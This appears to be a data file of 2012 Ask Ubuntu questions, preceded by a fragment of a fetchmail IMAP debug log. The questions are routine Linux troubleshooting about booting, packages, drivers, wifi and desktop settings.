fetchmail : imap < company name fetchmail : imap < my name fetchmail : imap < it fetchmail : imap < tel : ( xxx ) xxx-xxxx xxxx fetchmail : imap < www.domain.com=20 fetchmail : imap < fetchmail : imap < fetchmail : imap < -- -- -message d'origine -- -- - fetchmail : imap < de=a0 : user [ mailto : user @ domain.com ] =20 fetchmail : imap < envoy=e9=a0 : 2 juillet 2012 15:50 fetchmail : imap < =c0=a0 : informatique fetchmail : imap < objet=a0 : problem : photo fetchmail : imap < fetchmail : imap < notification type : problem fetchmail : imap < author : =20 fetchmail : imap < comment : =20 fetchmail : imap < fetchmail : imap < host : photos fetchmail : imap < hostname : photo fetchmail : imap < state : down fetchmail : imap < address : xxx.xx.x.xx fetchmail : imap < fetchmail : imap < date/time : mon jul 2 15:49:38 edt 2012 fetchmail : imap < fetchmail : imap < info : critical - xxx.xx.x.xx : rta nan , lost 100 % fetchmail : imap < fetchmail : imap < fetchmail : imap < ) fetchmail : imap < a0007 ok fetch completed fetchmail : imap > a0008 fetch 1 body.peek [ text ] fetchmail : imap < * 1 fetch ( uid 343 body [ text ] { 539 } ( 539 body octets ) ******************************* fetchmail : imap < ) fetchmail : imap < a0008 ok fetch completed flushed fetchmail : imap > a0009 store 1 +flags ( \seen \deleted ) fetchmail : imap < * 1 fetch ( uid 343 flags ( \seen \deleted ) ) fetchmail : imap < * 1 expunge fetchmail : imap < a0009 ok store completed fetchmail : imap > a0010 expunge fetchmail : imap < a0010 ok expunge completed fetchmail : mail expunge mismatch ( 0 actual ! = 1 expected ) fetchmail : imap > a0011 logout fetchmail : imap < * bye closing connection fetchmail : imap < a0011 ok logout completed fetchmail : client/server synchronization error while fetching from domain\user @ localhost fetchmail : 6.3.19 querying localhost ( protocol imap ) at tue 03 jul 2012 09:46:36 am edt : poll completed merged uid list from localhost : < empty > fetchmail : query status=7 ( error ) fetchmail : normal termination , status 7
159124	mouse and keyboard focus problem	i have two chrome windows side by side . i click a link in window # 1 , ok. now i want to switch to window # 2 and click anywhere in the window . noting happens . sometimes the cursor switch to make-bigger-window style . if i click in the top part of current window . and then in the top part of next window i can switch focus so the other window works . another problem is that the keyboard focus can get stuck in one window . i can click on things in one window but when using the keyboard it will change the first window . only by closing the window that has the focus , it will release keyboard . what is this madness ? another problem not related is that sometimes i get logged out . just like that . update : i can make the mouse work outside current window sometimes by clicking my name in the upper right corner .
159131	how to distinguish doc , ppt , xls files , without looking at file extension	so i was wondering how would you differentiate ppt , xls and doc files from each other in linux regardless of extensions . i tried 'file ' but from the looks of it , all of msoffice files are categorized under the same file type . similarly i 'm having trouble with docx , xlsx and pptx files , since they 're essentially all zip files containing a bunch of xml . i also tried a python script importing the magic module , but no go . i 'm trying to identify the actual file for a sandbox analysis . and for this specific purpose i need to find the actual file type in order to run it in the sandbox vm ( the windows vm runs everything by extension ) . let 's say my sample file is labeled as try.exe , but in reality it 's just a doc file . my script will rename it as try.exe.doc , which would work fine for doc files . but since linux identifies all msoffice files as simple doc files then there 's no way to identify ppt or xls files . as a result the sandbox wont ' analyze the sample correctly .
159139	how do i know the password for my encrypted home directory ?	i encrypted my home to protect against hackers of course when i first installed ubuntu . it loaded up the terminal and was attempting to show me my encryption password incase it ever needed to be used . so i thought `` ehh what the heck , i can find it out later ... '' so i closed terminal and went on with the ( amazing ! ) ubuntu life . but now i am having to install java jdk 7.0.0.4 onto my computer to ya know , play games and such . but it is asking for my password for the encrypted home folder but it never gave it to me ... help ! ! ! does anyone remember the command for terminal to give you you 're randomly generated encryption password pop up on the famous purple window ?
159153	what happened to tortoisehg-nautilus in 12.04 ?	when i run sudo apt-get install tortoisehg-nautilus under ubuntu 12.04 i get : e : unable to locate package tortoisehg-nautilus the same command works under ubuntu 10.04 and i get full nautilus integration . i tried installing tortoisehg and using the ppa : tortoisehg-ppa/releases ppa but i do n't see any nautilus integration . right clicking on folders does not bring up a tortoisehg menu item , nor do i see icon overlays for hg repositories . any ideas ?
159159	fix broken removable ntfs hard drive	i have a 1tb hard drive from a friend which does n't work as it should . when plugged into my ubuntu laptop , hard drive label is shown on nautilus , when clicked , error message pops out : error mounting : mount exited with exit code 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . sudo fdisk -l shows disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9cf4ffb0 device boot start end blocks id system /dev/sdb1 2048 1953523119 976760536 7 hpfs/ntfs/exfat my laptop has only 250gb , so it seems i ca n't use ddrescue etc . i only have winxp on virtualbox , i tried starting up windows with the hard drive mounted and type chkdsk \f from cmd , but it looks like it 's going to check the ntfs partition of c : but not the removable hard drive . tried ntfsck and ntfsfix before , no vail . urgently need some advice on how to fix the removable hard drive , if not possible then how to ( selectively ) backup data into readable format ?
159160	the package system is broken when trying to install updates	when i try to install updates with update manager i get this message the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : `apt-get install -f` the following packages have unmet dependencies : libc6-dev : i386 : depends : libc6 ( = 2.15-0ubuntu10 ) but 2.15-0ubuntu10 is installed depends : libc-dev-bin ( = 2.15-0ubuntu10 ) but 2.15-0ubuntu10 is installed and when i type in apt-get install -f i get this answer e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? what to do ?
159163	disable dash shortcut ?	the dash keeps popping up , when i use `` alt + right arrow key '' to skip to the next track in rhythmbox . it happens when i skip tracks several times . i 'm guessing this is because pressing `` alt '' twice starts dash . is there any way of changing either shortcut ?
159172	hp laserjet p1006 stopped working after updates	i deleted the printer and installed hplip from ubuntu software centre . got error message : stopped backend/usr/lib/cups/backend/hp does not exist i removed and reinstalled hplip . now the printer will only show as a usb connection and still does n't work . the job appears as processing and then printer shows idle , but nothing happens .
159175	problem when opening nvidia x server settings program	as you can see here in screenshot the nvidia x server settings program is installed but when i click it , simple nothing happens ... this is a very strange problem.. i want to connect my laptop with hdmi and with a quick search on google i must do it with that program ... any ideas ?
159178	kernel upgrade breaks asus usb-n13 wifi card ubuntu 12.04	i compiled and installed usb-n13 wifi drivers using dkms . everything was fine with the wifi and i also had 1 successful kernel upgrade ( 3.2.0-24 ) . since kernel version 3.2.0-25 ( and recently 3.2.0-26 ) my wifi card ca n't connect to my ap . iwconfig output is below : ra0 ralink sta essid : '' 11n-ap '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate:1 mb/s rts thr : off fragment thr : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 my /etc/network/interfaces file is below : # wifi network card auto ra0 iface ra0 inet dhcp wpa-ssid < mynetrowk > wpa-psk < mypassword > update 1 : i totally forgot to mention that after i reboot system 4-5 times wifi starts to work again . would like to know where should i start to look for the issues since this behavior is not acceptable .
159181	need to fix scrolling in chrome	im just using a regular desktop . chrome is scrolling the wrong way and it is driving me crazy ! i cant find options for fixing it anywhere . normally i can just type something in google and find the answer but its not working this time . someone please help ! ! thanks to who ever helps me out . : )
159182	ntfs file system has become read only after running gparted	i installed gparted and all my ntfs file systems have become read-only.i tried the solution given here how to change permissions to the other drives in a hard disk ? , using pysdm , but i 'm unable to change file system from read only . changing /etc/fstab as indicated in the same post gives me an error . please help . is there any other way of rectifying this problem ?
159184	`` package dependencies can not be resolved '' while installing chromium browser	i installed 12.04 in my system . while trying to install chromium , i get the following error : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : chromium-browser : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libudev0 ( > = 147 ) but 175-0ubuntu9 is to be installed depends : libxss1 but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed depends : libnss3-1d ( > = 3.12.3 ) but it is not going to be installed can any one solve the issue please ?
159187	`` /dev/sda2 contains a file system with errors '' at every boot , even after using fsck	i encounter the following messages at every boot : init : ureadahead main process ( # # # # ) terminated with status 5 /dev/sda2 contains a file system with errors , check forced . the check always passes with no errors . i have used a livecd to run fsck on /dev/sda2 and initially it claimed the disk was clean and did n't need to be checked . i then forced a check and everything still came out clean . i have since tried rebooting the system normally several times and am still getting the above messages . is this a sign of a failing hard drive ?
159191	list all filesystems with a common label	for various reasons , i have two partitions that both have a label of root on an embedded system i 'm developing . the findfs command only finds the first device with the label . is there a way i can find all devices with the label ?
159192	dynamic editing and running quickly apps	is there a possibility of viewing the app changes dynamically as i edit the code or the interface ( in glade ) . i want to basically edit and view the changes in the app on the fly , without restarting the app again .
159195	how do i set xbmc as the default media player ?	i 've recently started using xbmc and i love it . the only thing is i cant find a way of setting it as the default media player . it just does not show up on the default list . i hope someone out there help on this .
159196	filebrowser with features like different thumbnail size , improved status bar and more	i use nautilus and pcmanfm but i need more functionality , maybe you know other file manager which have these functionality : sort files with grouping by name , type , etc - and possibility to mix all of them thumbnails size regulation by mouse like in ms windows , because its faster than changing size in settings thumbnails of psd files in status bar possibility to show image resolution , not only file size , file type , etc tree or favourites or both at the same time i do n't looking for typical image browser because i want see all files , not only images . but please if you know one good you can recommend me it . maybe you too working with a lot of image files and text files and you found nice solution ?
159197	how do i adjust my display for 1080p ?	just a quick question ... i got a new 24 '' hd tv to use as a pc monitor and have windows pre installed . in the windows 7 display settings { control panel/display } is a option to make things on the screen appear bigger this works great at high res and i was wondering if any one knew a similar setting or program to get the same effect on ubuntu . do n't mind if its for unity , gnome or kde etc ... thanks
159199	upload quickly project to launchpad with `` quickly share '' not working !	i want to upload my quickly project for the ubuntu app showdown . i signed the ubuntu code of conduct successfully and created a project `` interest-calculation '' on my launchpad-portal . when i enter in my project-folder the following command : quickly share i get the following error-output : lade launchpad-einstellungen erfolgreich mit launchpad verbunden traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/share.py '' , line 127 , in < module > print ( _ ( `` % s does not exist . please create it on launchpad if you want to push a package to it . % s has the following ppas available : '' ) % ( e , ppa_user.name ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 7 : ordinal not in range ( 128 ) fehler : befehl share fehlgeschlagen wird abgebrochen what should i do ? i am ready with coding but without uploading the project to launchpad i ca n't participate the ubuntu app showdown . i also tried : quickly submitubuntu after that i will be asked for the project ( witch has the same name on launchpad as on my filesystem `` interest-calculation '' . lade launchpad-einstellungen erfolgreich mit launchpad verbunden no launchpad project set , leave blank to abort . launchpad project name : interest-calculation kein projekt gefunden , leave blank to abort , 0 for another search . i also created a `` dput.cf '' on my home-dir with the following input : [ ppa ] fqdn = ppa.launchpad.net method = ftp incoming = ~reg-mlux/ppa/ubuntu login = anonymous allow_unsigned_upload = 0 i found that on a video-tutorial for `` submitting your app '' on the app showdown page .
159203	install of ubuntu 10.04.4 give only a black screen with flashing underscore on boot up	so installed ubuntu from a live cd with just standard setup so the partions are so : sda1- ext4 filesystem with boot flag sda2- extended partion containing sda5- swap space installed to clean hdd and the install seemed fine but upon reboot after bios post only black screen with white flashing underscore appears and excepts no key strokes . have tried all the obvious things reinstall grub add nomodeset parameter no success so any ideas
159205	how come no one outside my network can connect to my owncloud server ?	i installed lawn software for internet online for my server , i installed owncloud 4 on it . i can connect to it using my newwork internet , but no one out side my internet newwork can connect , they say it says can not connect to server . how to i fix this ? the ip to the server is : 192.168.0.102
159211	unity multi-monitor problem	i have multi-monitor setup where one ( separate ) is set above another ( notebook ) . notebook is set as main monitor , this is where launcher is . there are a couple side effects : when i open a new app , ex . nautilus , it appears on top screen while the mouse and launcher is on the bottom ( notebook ) when i unplug top monitor , some windows ( ex . skype , zim , console ) appear to be below notebook and thus invisible . i can only access them by focusing using alt-tab and then ctrl-space + move window i use unity with ubuntu 12.04 , intel sandy bridge built-in video . any tips ? is it known bug ?
159212	how to fix the aircrack-ng channel -1 error ?	i have a satellite p205-s6337 , intel core 2 duo t5300 , 2gb memory , 945gm chipset . i already have the release 12.04 ( precise ) 64-bit , kernel linux 3.2.0-26-generic . i 'm using aircrack-ng but still getting the channel -1 error . when i run aireplay-ng i get waiting for beacon frame ( bssid : xx : xx : xx : xx : xx ) on channel -1. wlan0 is on channel -1 , but the ap uses channel 3 . what is the way to solve this ? thanks .
159216	ubuntu ca n't update some repositories	why ca n't ubuntu update some repositories ? especially from extras.ubuntu.com , ppa tualatrix for ubuntu tweak , and docky ppa . in below , shows all my authentic keys , is any wrong ? sorry for my english
159218	why does my installation fail with a black screen ?	i am trying to install ubuntu 12.04 lts on my compaq presario v6000 laptop . i have tried to install from a live-cd and from a usb and both get me the same result . i have changed the order i boot from upon start up accordingly and all i ever get is a black screen . i am not sure what the problem is .
159220	set default value of glade comboboxtext	how can i set a default value of a comboboxtext in glade ? if i run my program with quickly the combobox appears empty until the user choose something from the list . i would like to display the first list entry when the program starts . thanks stefanie
159222	having different wallpaper per workspace in ubuntu 12.04	how to setup different wallpapers in different workspaces ? as in previous questions asked as per the link mentioned below : is it possible to have a different background for each workspace ? having problems with following steps in ubuntu 12.04. gconf-editor does n't have an option of show desktop in preferences in nautilus . how to go on about setting my workspaces ? have ubuntu 12.04 with x86-64 bit architecture ( if that is of any help ) and working with unity . is there in any way of customizing unity launcher also for different workspaces ? thanks in advance .
159227	how to exit grub rescue prompt without live cd ?	i have had ubuntu 12.04 x86 ( 32-bit ) for a while now and decided to erase it and reinstall it just to clear some memory and start over . i have performed this operation before and it worked fine , but after restarting this time , i got an elf header smaller than expected error and a grub rescue prompt . i am not so concerned about the error this time because i know that the operating systems and all my files are still there ( at least i think they are after running the ls command at the prompt - example drive : ( hd1 , msdos6 ) ? ) . i would boot from the live cd and make changes inside , but the optical drive does not work , and my dell optiplex gx260 does not have the bios capability to boot from the usb drive i installed . i have done some research , and it sounds like grub is corrupted and/or did not install right . maybe this had something to do with the fact that it was already installed , or where it was installed . do i have to set the path and root drive for grub , or what can i do to get the operating system up and working again ?
159234	suspend turned off , but computer keeps suspending	i 'm running ubuntu 12.04 with a fairly fresh install ( 2 update sessions ) i turned off the suspend function in bios and system settings but my computer keeps suspending about every 5 or 10 minutes of inactivity . i just switched the setting to 1 hour , hoping i 'll at least get a little more time , but i would really like it to never suspend . thanks everybody in advance .
159237	python - access variable in another class	i have 1 main window and 1 dialog . now i need to access variable in main window from dialog . for example in java we have 2 classes : demo and myclass in my class i have following code : public static int number=5 ; then i simply access it using myclass.number . how to do it in python using quickly ide ? do i need to import main window in dialog to get access to static variable ?
159239	how can i sort out a resolution problem with icewind dale in wine ?	a lot of the games i like to play do n't run too well on my xubuntu laptop , so i decided that i was going to play icewind dale . i installed it , but when i go to play , 2/3 of the graphics is off the top of the screen . apparently , icewind dale has a windowed mode , but i do n't know how to enable it out of the screen , so now i 'm just kind of stuck . i 'm running wine 1.5.5 . anyone know of any solutions ?
159241	resize/create a new partition in gparted	so i 've been having some trouble recently with ubuntu and decided it was time to switch to windows . but i have no ntfs partitions on my hard disk and gparted will not let me resize my one large partition ( /dev/sda1 ) so that i can allocate some ntfs space to install windows on . any help would be greatly appreciated , i 've had this problem for quite some time now and it had just become one big headache . thanks in advance !
159243	ubuntu 12 , chromium/chrome facebook not loading	this problem started with chrome , tried chromium to fix it . both have this problem , and after installed firefox no longer works with facebook . i found a threas with two fixes that work and what i need to know is how to make these fixes permanent . one is a cache permissions workaround . launching chromium from terminal with a redirect to a new self created cache in the home folder works . how can i repair the permissions issue with the cache or make a permanent change to the cache chromium uses ? two , the ifconfig wlan0 mtu set to 1492 , this setting doesnt seem to be perpetual after a reboot . this set of issues is i believe specific to my particular install as there isnt a huge issue from anyone else out there , i 'm on a toshiba satellite laptop with a 50/50 hdd partition split with windows . this is likely causing the issue or contributing in some way but i wont run linux full time on this machine until i get these kinks a more permanent fix . thanks in advance for any advice/answers .
159244	did wubi damage my raid-1 array ?	after installing ubuntu i found the helpful wubiguide that informed me that raid configurations are not supported by this wubi installation of ubuntu . still , the wubi installer appears to have worked , at least initially . my first attempt to boot to ubuntu was successful , but then all subsequent attempts take me to grub terminal . windows still boots without trouble . the size of the root.disk file is 0 , but it exists . i 'm not sure if that 's normal or if it was corrupted or what ... but based on the guide i used the windows command chkdsk /r to check my disk . it found many errors , but it did n't produce a `` found.000 '' file that i could find . is it possible that running ubuntu in this unsupported raid1 configuration would cause data corruption problems to files available through the windows os ? i backed up my most important files , so i could restore specific files if they are corrupt . i have no idea how to interpret the windows chkdsk log , perhaps this would give some indication about which files ( if any ) were damaged .
159249	how can i upload to a ppa without .changes file ?	so , i 'm developing an app for the ubuntu showdown , and as quickly is still very buggy ( i had problems using it ) , i decided to do my app entirely from scratch , using python/gtk+3 . i 've done my app and i 've just packaged it using only fakeroot dkpg-deb -- build . the problem is that i ca n't create a .source file , as i do n't have a changelog file and the debian folder can not be used in debuild , as is uncorrectly organized . the text shown by ls -l -r : . : total 16 -rw-rw-r -- 1 francisco francisco 2 jul 3 17:48 compat drwxrwxr-x 2 francisco francisco 4096 jul 3 20:37 debian drwxrwxr-x 3 francisco francisco 4096 jul 3 18:36 opt drwxrwxr-x 3 francisco francisco 4096 jul 3 20:40 usr ./debian : total 36 -rwxr-xr-x 1 francisco francisco 1327 jul 3 20:26 control -rwxr-xr-x 1 francisco francisco 1329 jul 3 20:17 control~ -rwxr-xr-x 1 francisco francisco 10 jul 3 20:20 postinst -rwxr-xr-x 1 francisco francisco 10 jul 3 20:36 postrm -rwxr-xr-x 1 francisco francisco 121 jul 3 20:35 postrm~ -rwxr-xr-x 1 francisco francisco 10 jul 3 20:20 preinst -rwxr-xr-x 1 francisco francisco 10 jul 3 20:20 prerm -rwxr-xr-x 1 francisco francisco 530 jul 3 20:37 rules -rwxr-xr-x 1 francisco francisco 530 jul 3 20:37 rules~ ./opt : total 4 drwxrwxr-x 3 francisco francisco 4096 jul 3 18:36 espectalll123 ./opt/espectalll123 : total 4 drwxrwxr-x 2 francisco francisco 4096 jul 3 18:36 virtuam ./opt/espectalll123/virtuam : total 28 -rw-rw-r -- 1 francisco francisco 12614 jun 27 13:58 assistant.glade -rwxrwxr-x 1 francisco francisco 758 jun 30 17:53 virtuam -rwxr-xr-x 1 francisco francisco 6285 jul 3 17:39 vui.py ./usr : total 4 drwxrwxr-x 4 francisco francisco 4096 jul 3 20:46 share ./usr/share : total 8 drwxrwxr-x 2 francisco francisco 4096 jul 3 20:46 applications drwxrwxr-x 2 francisco francisco 4096 jul 3 20:40 pixmaps ./usr/share/applications : total 4 -rwxrwxr-x 1 francisco francisco 304 jul 3 20:43 virtuam.desktop ./usr/share/pixmaps : total 188 -rw-r -- r -- 1 francisco francisco 189478 jun 30 17:42 virtuam.svg so , this is the question : can i upload my app to the ppa without the .source file ? if not , how can i create it ?
159257	how do i stop unity launcher icon from shaking wobbling , jumping , bouncing , running , and cavorting ?	when i 'm focused and working on something , sometimes an app ( like update manager ) will decide that it is more important than i am , and start jumping and bouncing and wobbling and waving and generally cavorting around like a spoiled , misbehaving 3-year-old . in general , being very annoying . how do i stop this behavior ? i 'll get to an app when i get to it - it should n't be so needy . i need to work , not spend all day at the service of whatever application pops up .
159267	push email / email server tutorial	does anyone happen to know the current status of push email in the linux world ? from my searching at the moment i have seen z-push http : //www.ifusio.com/blog/setup-your-own-push-mail-server-with-z-push-on-debian-linux and https : //peterkieser.com/2011/03/25/androids-k-9-mail-battery-life-and-dovecots-push-imap/ are there other solutions ? does anyone have any experiences with these ? they 're somewhat different in that z-push seems to work in conjunction with an existing imap server ? some time ago i did manage to compile and build dovecot 2 ( since only dovecot 1 was available in the ubuntu repos at the time ) , it would have been a real fluke because i had no idea what i was doing but it seemed to work well with my mobile phone , that said , i ca n't say for sure that it was pushing , but it seemed like it . anyway , i 'm here again and looking to set up a mail server . i 'm hoping to do a better of a job this time around with virtual users and such . without installing ispconfig3 ( or something similar ) , does anyone have any recent email server tutorials ( that cover all aspects mta , mda ... ) that can supply push email on a ubuntu 12.04 server ? ( i 'm probably of slightly above newb status , but not far ) thanks a bunch
159268	stuck in busybox after update	i should start out by saying that i am not very tech savvy and have done my best to understand what is going on here from reading other people 's posts and have fumbled my way through several attempted fixes without getting anywhere ... i run ubuntu 12.04 on an admittedly cheap laptop from ebuyer and in spite of being cheap and not a brand laptop i have never had any major problems with it . since updating to 12.04 when it was released the boot-up process has always been slow . logging in takes about 30secs longer than it used to and if i closed my laptop and opened it again instead of being met with a login screen i 'd be met with a black screen with a white mouse . as all of these problems had a behavior-changing fix ( do n't close laptop , patiently wait for login , etc . ) i did n't think of reporting any of the issues . last night when the update manager prompted me that there were updates available i duly did them as i usually do . at the time a bug report came up and i can not remember what it said but i reported the bug as i was prompted to do . then this morning when i started up my laptop it went through the usual sequence , grub , purple screen with 'ubuntu ' etc . and then when it tried to boot up it went into busybox and i have not been able to do anything to solve this . i have tried going into the grub menu and starting previous versions but i come to the same point - busybox . i have borrowed another rather elderly laptop with windows vista to try and download boot repair and ubuntu and burn them onto cd . i tried downloading boot repair five times , to laptop , cd and usb . every time it would download and burn fine but then the windows laptop would tell me that 1 % did not download properly and my laptop would not run the usb or cd upon booting . i then tried to download ubuntu and make a livecd , twice , but again was told that 1 % did not download properly and again my laptop will not run ubuntu from the cd upon booting even if/when i went into the f2 menu and changed the menu priority ( if that 's what you call it ) for booting up to make sure it was definitely trying the usb/cd first . this is the message i get from busybox : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands i have tried 'exit ' but it mentions things about 'kernal panic ' and 'tried to quit init ! ' and 'ca n't find /root/dev/console : no such file ' . i know that the problem is probably caused by a problem with a kernal caused by the update last night , but i could n't honestly tell you exactly what was updated and without being able to boot from a livecd i 'm not sure how to go about fixing this . as i said , i am not tech savvy and have done what i can to try and find a solution to the problem but i 'm starting to feel like i 'm out of options . does anyone have any ideas ?
159270	how to set up dual boot ?	i used the usb installer to create a bootable usb pendrive from the ubuntu 12.04 amd64 iso image . i followed the basic installation and got ubuntu on my laptop , alongside with windows 7 , which came with the machine . the problem is i ca n't find any way to boot ubuntu when starting windows , unless the pendrive is inserted at startup . when the pendrive is inside , grub appears , otherwise , nothing . how can i fix this ? and , secondly , in case i now want to get rid of windows 7 and assign all space to ubuntu , , what would be the best path to take , now ?
159278	vga_switcheroo and intel hd 3000 on ubuntu 12.04	i 'm trying to get vga_switcheroo to enable my integrated intel hd 3000 instead of my ati card . my problem is that there is no vgaswitcheroo directory in /sys/kernel/debug/ on my system . > grep -i switcheroo /boot/config-3.2.0-26-generic config_vga_switcheroo=y and yet : > sudo ls /sys/kernel/debug/ acpi bdi bluetooth dri extfrag gpio ieee80211 kprobes mce mmc0 regmap regulator sched_features suspend_stats tracing usb wakeup_sources x86 i am not using the fglrx driver . here is the output of lspci ; glxinfo | grep renderer : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b4 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.7 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 8 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm67 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m series ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati caicos hdmi audio [ radeon hd 6400 series ] 24:00.0 firewire ( ieee 1394 ) : jmicron technology corp. ieee 1394 host controller ( rev 30 ) 24:00.1 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 30 ) 24:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 30 ) 25:00.0 network controller : intel corporation centrino advanced-n 6205 ( rev 34 ) 26:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) opengl renderer string : gallium 0.4 on amd caicos both xserver-xorg-video-intel and xserver-xorg-video-radeon packages are installed . i know there are tons of posts about hybrid-graphics already but i could n't quite find a solution to my problem . does anyone know why is /sys/kernel/debug/vgaswitcheroo not showing ?
159280	mount a device read only using udisk w/ python	so i am writing a python script that is attempting to use udisk to mount and unmount devices . i 'm using something like this : disk_dev_func = dbus.interface ( self.device_obj , `` org.freedesktop.udisks.device '' ) disk_dev_func.filesystemunmount ( '' ) disk_dev_func.filesystemmount ( ) so the unmount works just fine , my question , however is how to get the last line ( mount ) to work . i want to know what arguments i need to mount a device read only and i can not for the life of me find any adequate examples of how to do this .
159287	skype chat opens full screen and i ca n't get off it	skype was working perfect and then all of a sudden the chat box was full screen sized . once you click on the skype icon from the side bar it takes you straight to the full sized chat windows ( by full sized i mean the side bar , top bar , and the programs close buttons disappear ) i have uninstalled skype and installed again but the issue is still occurring . i looked about but could n't find an answer , thanks for any help !
159294	kernel error during upgrade due to `` /etc/default/grub : syntax error : newline unexpected ''	summary : linux-image-3.5.0-2-generic upgrade to linux-image-3.5.0-3-generic the default ubuntu 12.04 update is generating the following error for weeks ( the link below ) . obs . : i 'm using default update of ubuntu 12.04 ie , apt-get update . log error : https : //gist.github.com/3036775 overall he is trying to do the following : upgrade the `` linux-image-3.5.0-2-generic upgrade to linux-image-3.5.0-3-generic '' and the error always , always . what to do ?
159297	how can i avoid having to manually type `` sudo modprobe ndiswrapper '' to initiate my usb wifi	i have installed ndiswrapper and the driver bcmwlhigh5.inf for my netgear usb wifi . after booting my wifi is always offline . i can activate it using the command sudo modprobe ndiswrapper the wireless connection activates and stays active . unfortunately this system is for my spouse who is blind . i do n't want her to have to type terminal commands . is there a file that i can append the aforementioned command to that will start the wireless on boot ? i 'm running ubuntu 12.04 lts
159301	ubuntu graphics card and installation problems	i last tried ubuntu when it was 7.04 and it had a lot of issues with my old computer . good that i managed to fix the sound card . my pc broke after that and i stopped using ubuntu for a few years . then recently i got a new pc and i decided to try ubuntu 12.04 again since i liked it more than windows before . my new pc has 2 internal and 1 external hd . if i put ubuntu on my external hd ( only data on it ) will it affect the windows installation on the internal hd ? i have an ati radeon 2100 video card . will it work with ubuntu ?
159302	what 's up with the libqtrpc2-1 / rds package in the archives ?	i am considering using libqtrpc2-1 in my application but there seems to be some confusion over the name of the package . on the right-hand side of the package page , we see : so it looks like the package is named `` rds '' . ... or is it ? attempting to view the copyright file results in a 404 . the changelog file however , loads fine . the link for bug reports contains `` rds '' in the url . it gets worse - the -devel package contains a directory in /usr/include that is named qtrpc2 not rds . this is confusing to say the least . so what is the name of this package ? and what 's going on ?
159303	step by step copy paste tutorial for configuring vnc/rdp without a reboot	i have an existing ssh connection between my computer ( a:12.04 ) and a remote computer ( b:10.04 ) ( from a i just type ssh b ) . i have root access on both . both use ubuntu desktop edition . i am struggling to set up a remote desktop solution . after a lot of different software and tries , the closest i got was to be able to connect to the vnc server with vinagre , but the screen remained black , for an unknown reason .
159306	how do i install broadcom 's firmware for a powerpc ?	i 'm running 12.04 lts on a powermac g5 and i have one problem . my wireless pci card has my `` firmware missing '' . i already know about broadcom 's poor wireless support with ubuntu , and it 's b43 however whenever i try to install the b43 firmware installer i get this : snackadoodlepop @ snackadoodlepop-desktop : ~ $ sudo apt-get install firmware-b43-installer reading package lists ... done building dependency tree reading state information ... done e : unable to locate package firmware-b43-installer ndis wrapper wo n't work on powerpc to my knowledge . i 'm stuck without wifi and i need help ! solved : thanks to reddit 's /r/linuxquestions , i was able to use the b43 firmware installer correctly .
